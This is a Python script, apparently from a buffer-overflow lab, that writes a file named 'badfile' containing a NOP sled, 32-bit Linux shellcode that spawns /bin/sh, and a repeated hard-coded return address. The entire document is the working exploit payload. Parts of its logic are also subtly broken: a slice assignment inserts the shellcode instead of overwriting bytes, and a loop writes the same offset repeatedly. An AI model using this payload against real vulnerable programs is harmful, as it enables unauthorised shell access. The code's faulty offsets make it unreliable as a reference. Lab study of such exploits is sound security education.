shellcode= (
"\x31\xc0" # xorl %eax,%eax
"\x50" # pushl %eax
"\x68""//sh" # pushl $0x68732f2f
"\x68""/bin" # pushl $0x6e69622f
"\x89\xe3" # movl %esp,%ebx
"\x50" # pushl %eax
"\x53" # pushl %ebx
"\x89\xe1" # movl %esp,%ecx
"\x99" # cdq
"\xb0\x0b" # movb $0x0b,%al
"\xcd\x80" # int $0x80
).encode('latin-1')
# Fill the content with NOPs
content = bytearray(0x90 for i in range(768))

# Put the shellcode at the end
# start = 1600 - len(shellcode)
content[400:len(shellcode)] = shellcode

# Put the address
ret = 0xbfffea48+240
j=696
for i in range(696,760,4):
	content[j:j+4]=(ret).to_bytes(4,byteorder='little')
content[720:724] = (ret).to_bytes(4,byteorder='little')

#content = bytearray(0x41 for i in range(20))
#write
with open('badfile','wb') as f:
    f.write(content)

